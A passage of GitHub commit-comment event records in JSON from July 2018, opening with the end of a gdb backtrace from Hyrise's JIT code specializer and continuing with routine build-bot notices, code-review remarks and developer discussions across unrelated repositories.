opossum::JitCodeSpecializer::_clone_function (this=0x2fddfc8, context=..., function=..., cloned_function_name=\"llvm.lifetime.start.p0i8\")\r\n    at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/jit_code_specializer.cpp:350\r\n#9  0x0000000001e906e9 in opossum::JitCodeSpecializer::_inline_function_calls(opossum::SpecializationContext&) const::$_0::operator()<llvm::Function> (this=0x7fffffffc050, fn=...)\r\n    at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/jit_code_specializer.cpp:195\r\n#10 0x0000000001e904e2 in std::_Function_handler<void (llvm::Function const&), opossum::JitCodeSpecializer::_inline_function_calls(opossum::SpecializationContext&) const::$_0>::_M_invoke(std::_Any_data const&, llvm::Function const&) (\r\n    __functor=..., __args=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/std_function.h:316\r\n#11 0x0000000001e9ee98 in std::function<void (llvm::Function const&)>::operator()(llvm::Function const&) const (this=0x7fffffffc050, __args=...)\r\n    at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/std_function.h:706\r\n#12 0x0000000001e9ec69 in opossum::JitCodeSpecializer::_visit<llvm::Function const, llvm::Value>(llvm::Value&, std::function<void (llvm::Function const&)>) const (this=0x2fddfc8, element=..., fn=...)\r\n    at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/jit_code_specializer.cpp:425\r\n#13 0x0000000001e9eb56 in opossum::JitCodeSpecializer::_visit<llvm::Function const, llvm::Instruction>(llvm::Instruction&, std::function<void (llvm::Function const&)>) const (this=0x2fddfc8, element=..., fn=...)\r\n    at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/jit_code_specializer.cpp:415\r\n#14 0x0000000001e9e9bb in opossum::JitCodeSpecializer::_visit<llvm::Function const, llvm::BasicBlock>(llvm::BasicBlock&, std::function<void (llvm::Function const&)>) const (this=0x2fddfc8, element=..., fn=...)\r\n    at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/jit_code_specializer.cpp:403\r\n#15 0x0000000001e9269b in opossum::JitCodeSpecializer::_visit<llvm::Function const, llvm::Function>(llvm::Function&, std::function<void (llvm::Function const&)>) const (this=0x2fddfc8, element=..., fn=...)\r\n    at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/jit_code_specializer.cpp:398\r\n#16 0x0000000001e8e9d0 in opossum::JitCodeSpecializer::_inline_function_calls (this=0x2fddfc8, context=...) at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/jit_code_specializer.cpp:193\r\n#17 0x0000000001e8da81 in opossum::JitCodeSpecializer::specialize_function (this=0x2fddfc8, root_function_name=\"_ZNK7opossum13JitReadTuples7executeERNS_17JitRuntimeContextE\", runtime_this=warning: RTTI symbol not found for class 'std::_Sp_counted_ptr_inplace<opossum::JitConstantRuntimePointer, std::allocator<opossum::JitConstantRuntimePointer>, (__gnu_cxx::_Lock_policy)2>'\r\nwarning: RTTI symbol not found for class 'std::_Sp_counted_ptr_inplace<opossum::JitConstantRuntimePointer, std::allocator<opossum::JitConstantRuntimePointer>, (__gnu_cxx::_Lock_policy)2>'\r\n\r\nstd::shared_ptr<const opossum::JitRuntimePointer> (use count 3, weak count 0) = {...}, two_passes=true) at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/jit_code_specializer.cpp:63\r\n#18 0x00000000017a2131 in opossum::JitCodeSpecializer::specialize_and_compile_function<void (opossum::JitReadTuples const*, opossum::JitRuntimeContext&)>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::shared_ptr<opossum::JitRuntimePointer const> const&, bool) (this=0x2fddfc8, root_function_name=\"_ZNK7opossum13JitReadTuples7executeERNS_17JitRuntimeContextE\", runtime_this=warning: RTTI symbol not found for class 'std::_Sp_counted_ptr_inplace<opossum::JitConstantRuntimePointer, std::allocator<opossum::JitConstantRuntimePointer>, (__gnu_cxx::_Lock_policy)2>'\r\nwarning: RTTI symbol not found for class 'std::_Sp_counted_ptr_inplace<opossum::JitConstantRuntimePointer, std::allocator<opossum::JitConstantRuntimePointer>, (__gnu_cxx::_Lock_policy)2>'\r\n\r\nstd::shared_ptr<const opossum::JitRuntimePointer> (use count 3, weak count 0) = {...}, two_passes=true) at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/jit_code_specializer.hpp:50\r\n#19 0x00000000017a11c5 in opossum::JitOperatorWrapper::_on_execute (this=0x2fddf50) at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator_wrapper.cpp:64\r\n#20 0x000000000184359d in opossum::AbstractReadOnlyOperator::_on_execute (this=0x2fddf50) at /home/Fabian.Wiebe/hyrise/src/lib/operators/abstract_read_only_operator.cpp:10\r\n#21 0x000000000169633c in opossum::AbstractOperator::execute (this=0x2fddf50) at /home/Fabian.Wiebe/hyrise/src/lib/operators/abstract_operator.cpp:43\r\n#22 0x0000000001cb7387 in opossum::OperatorTask::_on_execute (this=0x5419690) at /home/Fabian.Wiebe/hyrise/src/lib/scheduler/operator_task.cpp:84\r\n#23 0x0000000001cb466a in opossum::AbstractTask::execute (this=0x5419690) at /home/Fabian.Wiebe/hyrise/src/lib/scheduler/abstract_task.cpp:93\r\n#24 0x0000000001cb42fd in opossum::AbstractTask::schedule (this=0x5419690, preferred_node_id=..., priority=opossum::SchedulePriority::Normal) at /home/Fabian.Wiebe/hyrise/src/lib/scheduler/abstract_task.cpp:62\r\n#25 0x00000000016fe0bb in opossum::CurrentScheduler::schedule_tasks<opossum::OperatorTask> (tasks=std::vector of length 4, capacity 4 = {...}) at /home/Fabian.Wiebe/hyrise/src/lib/scheduler/current_scheduler.hpp:71\r\n#26 0x00000000016f9065 in opossum::CurrentScheduler::schedule_and_wait_for_tasks<opossum::OperatorTask> (tasks=std::vector of length 4, capacity 4 = {...}) at /home/Fabian.Wiebe/hyrise/src/lib/scheduler/current_scheduler.hpp:77\r\n#27 0x00000000016f7edc in opossum::SQLPipelineStatement::get_result_table (this=0x2fb3360) at /home/Fabian.Wiebe/hyrise/src/lib/sql/sql_pipeline_statement.cpp:243\r\n#28 0x00000000016eb1d4 in opossum::SQLPipeline::get_result_table (this=0x2fdcc30) at /home/Fabian.Wiebe/hyrise/src/lib/sql/sql_pipeline.cpp:193\r\n#29 0x000000000160ba30 in opossum::Console::_eval_sql (this=0x2f66d50 <opossum::Console::get()::instance>, sql=\"select id  from mixed group by id;\") at /home/Fabian.Wiebe/hyrise/src/bin/console/console.cpp:260\r\n#30 0x000000000160b23c in opossum::Console::_eval (this=0x2f66d50 <opossum::Console::get()::instance>, input=\"select id  from mixed group by id;\") at /home/Fabian.Wiebe/hyrise/src/bin/console/console.cpp:193\r\n#31 0x000000000160aded in opossum::Console::read (this=0x2f66d50 <opossum::Console::get()::instance>) at /home/Fabian.Wiebe/hyrise/src/bin/console/console.cpp:166\r\n#32 0x000000000160dcac in main (argc=2, argv=0x7fffffffe488) at /home/Fabian.Wiebe/hyrise/src/bin/console/console.cpp:880\r\n`````\r\n\r\nFor me, the main problem is that non-virtual functions cannot be inlined.\r\nI started addressing the issue by a) trying to inline all non-virtual functions, again, and b) allowing inlining of non-virtual functions but have not reached a solution yet."}},"created_at":"2018-07-16T22:31:34Z"}
{"id":"7973322042","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29727446,"position":null,"line":null,"path":null,"commit_id":"ba5b36e2c6eb97f1821829613f1b951d029f5965","created_at":"2018-07-16T22:32:27Z","updated_at":"2018-07-16T22:32:27Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win32-master Continuous [Build 230](http://build.palaso.org/viewLog.html?buildId=124889&buildTypeId=Liblcm_LiblcmWin32masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:01:33"}},"created_at":"2018-07-16T22:32:27Z"}
{"id":"7973324056","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29727451,"position":null,"line":null,"path":null,"commit_id":"ba5b36e2c6eb97f1821829613f1b951d029f5965","created_at":"2018-07-16T22:33:05Z","updated_at":"2018-07-16T22:33:05Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win64-master Continuous [Build 195](http://build.palaso.org/viewLog.html?buildId=124891&buildTypeId=Liblcm_LiblcmWin64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:01:57"}},"created_at":"2018-07-16T22:33:05Z"}
{"id":"7973324140","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29727452,"position":null,"line":null,"path":null,"commit_id":"ba5b36e2c6eb97f1821829613f1b951d029f5965","created_at":"2018-07-16T22:33:07Z","updated_at":"2018-07-16T22:33:07Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-linux64-master Continuous [Build 197](http://build.palaso.org/viewLog.html?buildId=124890&buildTypeId=Liblcm_LiblcmLinux64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2620, ignored: 32 Build time: 00:02:10"}},"created_at":"2018-07-16T22:33:07Z"}
{"id":"7973331867","type":"CommitCommentEvent","actor":{"login":"ChristophGeske"},"repo":{"name":"ChristophGeske/ARCoreInsideOutTrackingGearVr"},"payload":{"comment":{"id":29727468,"position":null,"line":null,"path":null,"commit_id":"0199023fe71c1f042afa3429f143de1f535b203e","created_at":"2018-07-16T22:35:24Z","updated_at":"2018-07-16T22:35:24Z","author_association":"OWNER","body":"The camera can starts moving when tracking is lost by the camera. Dark rooms or white featureless walls can cause this.\r\n\r\nAlso at the very beginning the camera nedds some slight movement to find the position in the room. The camera detects depth by comparing the movement of feature points in the distance and close up.\r\n\r\nI do the following steps to get it work correctly.\r\n\r\n\r\n1. Hold phone infront of your eyes starting position\r\n2. Start the app and hold phone still \r\n3. If the scene starts to get loaded move slowly for and back and slightly left and right.\r\n4. Scan the room by slowly turning 360° continuing to move slightly left and right.\r\n5. Avoid comming to close to white walls or mirrors.\r\n\r\nI am constantly trying to improve the experience there are still many things that can be done to eliminate some of those errors. \r\n\r\n"}},"created_at":"2018-07-16T22:35:24Z"}
{"id":"7973332360","type":"CommitCommentEvent","actor":{"login":"cristian-david"},"repo":{"name":"cristian-david/appConvenioUsbSena"},"payload":{"comment":{"id":29727471,"position":null,"line":null,"path":null,"commit_id":"3d73c85eb7cc7311762a22829bfd0083b416113e","created_at":"2018-07-16T22:35:33Z","updated_at":"2018-07-16T22:35:33Z","author_association":"OWNER","body":"se creo las tablas de Pais departamentos y municipios"}},"created_at":"2018-07-16T22:35:33Z"}
{"id":"7973345306","type":"CommitCommentEvent","actor":{"login":"cristian-david"},"repo":{"name":"cristian-david/appConvenioUsbSena"},"payload":{"comment":{"id":29727498,"position":null,"line":null,"path":null,"commit_id":"3d73c85eb7cc7311762a22829bfd0083b416113e","created_at":"2018-07-16T22:39:10Z","updated_at":"2018-07-16T22:39:10Z","author_association":"OWNER","body":"se creo las tablas de Pais. departamentos y municipios"}},"created_at":"2018-07-16T22:39:10Z"}
{"id":"7973346544","type":"CommitCommentEvent","actor":{"login":"badener95"},"repo":{"name":"badener95/Jelly-Browser"},"payload":{"comment":{"id":29727500,"position":null,"line":null,"path":null,"commit_id":"cac976fea9fbe5f74b64925f6bd9f5cc5cb4ca09","created_at":"2018-07-16T22:39:33Z","updated_at":"2018-07-16T22:39:33Z","author_association":"OWNER","body":"Based on this: https://github.com/CarbonROM/android_packages_apps_Quarks/commit/dc6be53efd38adf7b1654fe863060a8ed6a5932b"}},"created_at":"2018-07-16T22:39:33Z"}
{"id":"7973346690","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29727502,"position":null,"line":null,"path":null,"commit_id":"0977da584f539a2c08fe5fb20b421beb00360607","created_at":"2018-07-16T22:39:36Z","updated_at":"2018-07-16T22:39:36Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https:///docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/.circleci/config.yml)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/scripts/deploy-multidev.sh)\n- [scripts/run-sitespeed-test.sh](https://github.com/pantheon-systems/documentation/commit/0977da584f539a2c08fe5fb20b421beb00360607/scripts/run-sitespeed-test.sh)\n"}},"created_at":"2018-07-16T22:39:36Z"}
{"id":"7973347887","type":"CommitCommentEvent","actor":{"login":"RichardWLaub"},"repo":{"name":"aidanSoles/ruby-mdl"},"payload":{"comment":{"id":29727506,"position":null,"line":null,"path":null,"commit_id":"b023425b26cf20e89c2bbca36249601f0cf8eb15","created_at":"2018-07-16T22:39:57Z","updated_at":"2018-07-16T22:39:57Z","author_association":"NONE","body":"LOVE this commit message 🤣"}},"created_at":"2018-07-16T22:39:57Z"}
{"id":"7973348288","type":"CommitCommentEvent","actor":{"login":"lackac"},"repo":{"name":"elixir-lang/flow"},"payload":{"comment":{"id":29727508,"position":5,"line":11,"path":"lib/flow/materialize.ex","commit_id":"ef17cefe6e005d1a116dc19d57dde3c588a7c5dc","created_at":"2018-07-16T22:40:05Z","updated_at":"2018-07-16T22:40:05Z","author_association":"CONTRIBUTOR","body":"`from_stages`"}},"created_at":"2018-07-16T22:40:05Z"}
{"id":"7973354740","type":"CommitCommentEvent","actor":{"login":"fgolemo"},"repo":{"name":"duckietown/gym-duckietown-agent"},"payload":{"comment":{"id":29727521,"position":5,"line":15,"path":"Dockerfile","commit_id":"52945df498a67cbba6f1c614bdffb022b0496d5b","created_at":"2018-07-16T22:41:52Z","updated_at":"2018-07-16T22:41:52Z","author_association":"COLLABORATOR","body":"oh no, they very different things. Matplotlib is there because the `gym-duckietown-agent` doesn't use any kind of visual output (i.e. no GL) except for the matplotlib backend for debugging. This is massively opposed to the original gym-duckietown and all the dependencies on pyyaml, pyglet, ipython, etc. We don't need any of that, but we do need matplotlib. \r\nAt least for now. I think ultimately there is a plan of redoing Maxim's lane-following on top of the `-agent` code, but we'll cross that bridge when we get there."}},"created_at":"2018-07-16T22:41:52Z"}
{"id":"7973355097","type":"CommitCommentEvent","actor":{"login":"gypsyaqp"},"repo":{"name":"gypsyaqp/hi-one"},"payload":{"comment":{"id":29727522,"position":null,"line":null,"path":null,"commit_id":"5897fdfc85682fd9d87d929a6844120c8e22535f","created_at":"2018-07-16T22:41:58Z","updated_at":"2018-07-16T22:41:58Z","author_association":"OWNER","body":"hello or hi "}},"created_at":"2018-07-16T22:41:58Z"}
{"id":"7973355256","type":"CommitCommentEvent","actor":{"login":"jlengstorf"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29727523,"position":27,"line":44,"path":"docs/docs/gatsby-style-guide.md","commit_id":"50ec6dd53e7609d08742cea620412c3666c7a9c6","created_at":"2018-07-16T22:42:00Z","updated_at":"2018-07-16T22:42:00Z","author_association":"MEMBER","body":"Can you change these to H2 and update the hierarchy accordingly? H1 should only be used for the page title.\r\n\r\n```diff\r\n- # How to submit a PR\r\n+ ## How to submit a PR\r\n```"}},"created_at":"2018-07-16T22:42:00Z"}
{"id":"7973359453","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29727527,"position":null,"line":null,"path":null,"commit_id":"adefdde4d8bf0668e4b996bea419f3d07fa516ca","created_at":"2018-07-16T22:43:12Z","updated_at":"2018-07-16T22:43:12Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/adefdde4d8bf0668e4b996bea419f3d07fa516ca/.circleci/config.yml)\n- [scripts/run-sitespeed-test.sh](https://github.com/pantheon-systems/documentation/commit/adefdde4d8bf0668e4b996bea419f3d07fa516ca/scripts/run-sitespeed-test.sh)\n"}},"created_at":"2018-07-16T22:43:12Z"}
{"id":"7973359582","type":"CommitCommentEvent","actor":{"login":"chopeen"},"repo":{"name":"chopeen/last-fm-not-mine-alert-func"},"payload":{"comment":{"id":29727528,"position":null,"line":null,"path":null,"commit_id":"c7cbcbc539c6dc2981e0aa2b3d8d6e75514b2eee","created_at":"2018-07-16T22:43:14Z","updated_at":"2018-07-16T22:43:14Z","author_association":"OWNER","body":"If a setting is used, name the key `NotMyArtistsApiKey` for consistency. @chopeen"}},"created_at":"2018-07-16T22:43:14Z"}
{"id":"7973361008","type":"CommitCommentEvent","actor":{"login":"sunshinenny"},"repo":{"name":"sunshinenny/POIStudy"},"payload":{"comment":{"id":29727530,"position":5,"line":61,"path":"src/com/utils/createAimExcelFile.java","commit_id":"2a5037199b30927835e1858fd0c3907814d1a672","created_at":"2018-07-16T22:43:36Z","updated_at":"2018-07-16T22:43:36Z","author_association":"OWNER","body":"### 改动\r\n使用 toString 会有空指针错误,故直接写入\r\n### 问题\r\n可能对其他格式不大友好,但是应该在 setCell 中可以定义相应的方法避免此问题"}},"created_at":"2018-07-16T22:43:36Z"}
{"id":"7973362332","type":"CommitCommentEvent","actor":{"login":"jlengstorf"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29727535,"position":27,"line":44,"path":"docs/docs/gatsby-style-guide.md","commit_id":"50ec6dd53e7609d08742cea620412c3666c7a9c6","created_at":"2018-07-16T22:43:59Z","updated_at":"2018-07-16T22:43:59Z","author_association":"MEMBER","body":"@shannonbux ^^"}},"created_at":"2018-07-16T22:43:59Z"}
{"id":"7973362958","type":"CommitCommentEvent","actor":{"login":"CanyonTurtle"},"repo":{"name":"CanyonTurtle/rosserial"},"payload":{"comment":{"id":29727538,"position":15,"line":127,"path":"rosserial_vex_cortex/README.md","commit_id":"a22ff270797f63a8a29dcd76af049f0c990f39b3","created_at":"2018-07-16T22:44:11Z","updated_at":"2018-07-16T22:44:11Z","author_association":"OWNER","body":"Thanks for the information! That is great news for everyone. "}},"created_at":"2018-07-16T22:44:11Z"}
{"id":"7973362971","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29727539,"position":742,"line":2841,"path":"mono/metadata/cominterop.c","commit_id":"18b6846a3a2218525b7335a1f0515de93a1e44ca","created_at":"2018-07-16T22:44:11Z","updated_at":"2018-07-16T22:44:11Z","author_association":"MEMBER","body":"This accidentally removed.\r\nRestored in  https://github.com/mono/mono/pull/9595."}},"created_at":"2018-07-16T22:44:11Z"}
{"id":"7973363707","type":"CommitCommentEvent","actor":{"login":"sunshinenny"},"repo":{"name":"sunshinenny/POIStudy"},"payload":{"comment":{"id":29727543,"position":44,"line":44,"path":"src/com/utils/readOriginExcelFile.java","commit_id":"2a5037199b30927835e1858fd0c3907814d1a672","created_at":"2018-07-16T22:44:24Z","updated_at":"2018-07-16T22:44:24Z","author_association":"OWNER","body":"**补充了一些判断条件**"}},"created_at":"2018-07-16T22:44:24Z"}
{"id":"7973364795","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/gas-properties"},"payload":{"comment":{"id":29727548,"position":null,"line":null,"path":null,"commit_id":"10a31ff9750b3595313cb3aae1acd190fa21f9cb","created_at":"2018-07-16T22:44:45Z","updated_at":"2018-07-16T22:44:45Z","author_association":"NONE","body":"#28"}},"created_at":"2018-07-16T22:44:45Z"}
{"id":"7973367003","type":"CommitCommentEvent","actor":{"login":"fgolemo"},"repo":{"name":"duckietown/gym-duckietown-agent"},"payload":{"comment":{"id":29727554,"position":5,"line":15,"path":"Dockerfile","commit_id":"52945df498a67cbba6f1c614bdffb022b0496d5b","created_at":"2018-07-16T22:45:25Z","updated_at":"2018-07-16T22:45:25Z","author_association":"COLLABORATOR","body":"So just to clarify: visually inspecting the observation of the duckiebot (i.e. looking at the camera image) is done in the original through pyglet. Here we do it through matplotlib because we don't have access to the original render pipeline, and matplotlib is quick and easy to use for that. (Plus matplotlib is directly vizdom-compatible for PyTorch development, yadda yadda)."}},"created_at":"2018-07-16T22:45:25Z"}
{"id":"7973368770","type":"CommitCommentEvent","actor":{"login":"diizzyy"},"repo":{"name":"cotequeiroz/openwrt-1"},"payload":{"comment":{"id":29727559,"position":null,"line":null,"path":null,"commit_id":"ba54ec7004425785e24d82dd1131c05ad9907759","created_at":"2018-07-16T22:45:54Z","updated_at":"2018-07-16T22:45:54Z","author_association":"NONE","body":"Awesome effort,\r\n\r\nI wonder however if we could simplify the compilation and configuration part as we seems to do a lot of things that buildroot and others doesn't.\r\n\r\nhttps://git.busybox.net/buildroot/tree/package/libopenssl/libopenssl.mk#n62"}},"created_at":"2018-07-16T22:45:54Z"}
{"id":"7973373609","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29727566,"position":null,"line":null,"path":null,"commit_id":"6bc561e7f3c847d31dd7df02df076b845cd0d269","created_at":"2018-07-16T22:47:21Z","updated_at":"2018-07-16T22:47:21Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/6bc561e7f3c847d31dd7df02df076b845cd0d269/.circleci/config.yml)\n- [scripts/run-sitespeed-test.sh](https://github.com/pantheon-systems/documentation/commit/6bc561e7f3c847d31dd7df02df076b845cd0d269/scripts/run-sitespeed-test.sh)\n"}},"created_at":"2018-07-16T22:47:21Z"}
{"id":"7973387339","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29727589,"position":null,"line":null,"path":null,"commit_id":"6bc561e7f3c847d31dd7df02df076b845cd0d269","created_at":"2018-07-16T22:51:07Z","updated_at":"2018-07-16T22:51:07Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/6bc561e7f3c847d31dd7df02df076b845cd0d269/.circleci/config.yml)\n- [scripts/run-sitespeed-test.sh](https://github.com/pantheon-systems/documentation/commit/6bc561e7f3c847d31dd7df02df076b845cd0d269/scripts/run-sitespeed-test.sh)\n"}},"created_at":"2018-07-16T22:51:07Z"}
{"id":"7973387684","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29727590,"position":33,"line":36,"path":"src/NosCore.WorldServer/Controllers/PacketController.cs","commit_id":"ca73a5c1ff66cc53253df5250486075d6a57ad37","created_at":"2018-07-16T22:51:12Z","updated_at":"2018-07-16T22:51:12Z","author_association":"COLLABORATOR","body":"Not FR but session language "}},"created_at":"2018-07-16T22:51:12Z"}
{"id":"7973388950","type":"CommitCommentEvent","actor":{"login":"wariyecabdicasiissiiriya"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29727591,"position":null,"line":null,"path":null,"commit_id":"a56feee6dbd5f0e75507b00fb8619afcc24e87a3","created_at":"2018-07-16T22:51:33Z","updated_at":"2018-07-16T22:51:33Z","author_association":"NONE","body":"3  .vscode/settings.json\r\n@@ -15,7 +15,8 @@\r\n     \"**/dist\": true,\r\n     \"**/out\": true,\r\n     \"tslint-rules/**/*.js\": true,\r\n-    \".awcache\": true\r\n+    \".awcache\": true,\r\n+    \".eslintcache\": true\r\n   },\r\n   \"editor.tabSize\": 2,\r\n   \"prettier.semi\": false,"}},"created_at":"2018-07-16T22:51:33Z"}
{"id":"7973390073","type":"CommitCommentEvent","actor":{"login":"PeterAltamirano"},"repo":{"name":"Jam3/AR.js"},"payload":{"comment":{"id":29727593,"position":null,"line":null,"path":null,"commit_id":"25dbcc93ef1e5707ff20a3c445f204418790f915","created_at":"2018-07-16T22:51:51Z","updated_at":"2018-07-16T22:51:51Z","author_association":"NONE","body":"@DonghyukJacobJang \r\n- Can we work on a separated branch (eg. `jam3-updates`) which we maintain, not directly master?\r\n- Why did we pushed only changed build file, not the source code change?\r\n- What's the parentId referring to, is it Jam3 specific or would be worth create an official PR?\r\n- Can we create a separated version branch e.g. `vx.x.x.1` (where x.x.x is official current version and .1 is a Jam3 update) then we can easily refer to adjusted specific version in the npm."}},"created_at":"2018-07-16T22:51:51Z"}
{"id":"7973392787","type":"CommitCommentEvent","actor":{"login":"fgolemo"},"repo":{"name":"duckietown/gym-duckietown"},"payload":{"comment":{"id":29727600,"position":5,"line":25,"path":"docker/standalone/Dockerfile","commit_id":"696c4b5243f8b244a65f6e4dbeef01295a3a0f0c","created_at":"2018-07-16T22:52:38Z","updated_at":"2018-07-16T22:52:38Z","author_association":"COLLABORATOR","body":"Oh yeah I must have broken it when I moved it. I didn't rebuild the docker image after moving. My go-to solution however was to just pull from github. "}},"created_at":"2018-07-16T22:52:38Z"}
{"id":"7973396294","type":"CommitCommentEvent","actor":{"login":"fgolemo"},"repo":{"name":"duckietown/gym-duckietown"},"payload":{"comment":{"id":29727605,"position":5,"line":25,"path":"docker/standalone/Dockerfile","commit_id":"696c4b5243f8b244a65f6e4dbeef01295a3a0f0c","created_at":"2018-07-16T22:53:44Z","updated_at":"2018-07-16T22:53:44Z","author_association":"COLLABORATOR","body":"The \"standalone\" docker is only here for legacy reasons though since we don't support this for the AIDO challenge. We should however make sure that people who built stuff on top of this don't break all their stuff."}},"created_at":"2018-07-16T22:53:44Z"}
{"id":"7973396398","type":"CommitCommentEvent","actor":{"login":"sheetaluk"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":29727607,"position":6,"line":529,"path":"h/views/accounts.py","commit_id":"499e46d7ad4a4a493e6e4e6a1dfff0bfca0d9017","created_at":"2018-07-16T22:53:46Z","updated_at":"2018-07-16T22:53:46Z","author_association":"CONTRIBUTOR","body":"Do i need to `form.render()` if the user does not have an email address? I don't think so. What do you think, reviewer?"}},"created_at":"2018-07-16T22:53:46Z"}
{"id":"7973397357","type":"CommitCommentEvent","actor":{"login":"andyneff"},"repo":{"name":"VisionSystemsInc/vsi_common"},"payload":{"comment":{"id":29727609,"position":36,"line":36,"path":"linux/uwecho.bsh","commit_id":"fe02468225c135b3f339eee2a186239e7a88a51c","created_at":"2018-07-16T22:54:06Z","updated_at":"2018-07-16T22:54:06Z","author_association":"MEMBER","body":"Not bugs, as this is intended to be limited and not all functioning? :)\r\nWill update the verbage"}},"created_at":"2018-07-16T22:54:06Z"}
{"id":"7973398047","type":"CommitCommentEvent","actor":{"login":"marc2k3"},"repo":{"name":"TheQwertiest/foo-jscript-panel"},"payload":{"comment":{"id":29727611,"position":null,"line":null,"path":null,"commit_id":"8a41c524a9c3c16c466204fde81c5c108975310b","created_at":"2018-07-16T22:54:18Z","updated_at":"2018-07-16T22:54:18Z","author_association":"NONE","body":"RE: arrow keys not working.... add this to your script:\r\n\r\n`window.DlgCode = DLGC_WANTALLKEYS;`\r\n\r\nhttps://github.com/marc2k3/foo_jscript_panel/blob/14d47f865a0085434f1505c6b3f904051d39aed0/foo_jscript_panel/docs/Flags.txt#L105"}},"created_at":"2018-07-16T22:54:18Z"}
{"id":"7973403370","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29727616,"position":null,"line":null,"path":null,"commit_id":"90bc4073e09268972cd926864b41572a55284f41","created_at":"2018-07-16T22:55:53Z","updated_at":"2018-07-16T22:55:53Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-390](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-390).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-390-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T22:55:53Z"}
{"id":"7973412494","type":"CommitCommentEvent","actor":{"login":"1990b"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29727643,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-16T22:58:50Z","updated_at":"2018-07-16T22:58:50Z","author_association":"NONE","body":"Ok man ! Je vais essayer. I’ll try\n\nBaba Badiane\n\nDe : Zeke Sikelianos\nEnvoyé le :Altine 16 Sullet 2018 22:17\nÀ : nice-registry/owners\nCc : 1990b; Mention\nObjet :Re: [nice-registry/owners] it's a start (91c5a82)\n\npremier pas: telecharger et installer node.js a https://nodejs.org\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2018-07-16T22:58:50Z"}
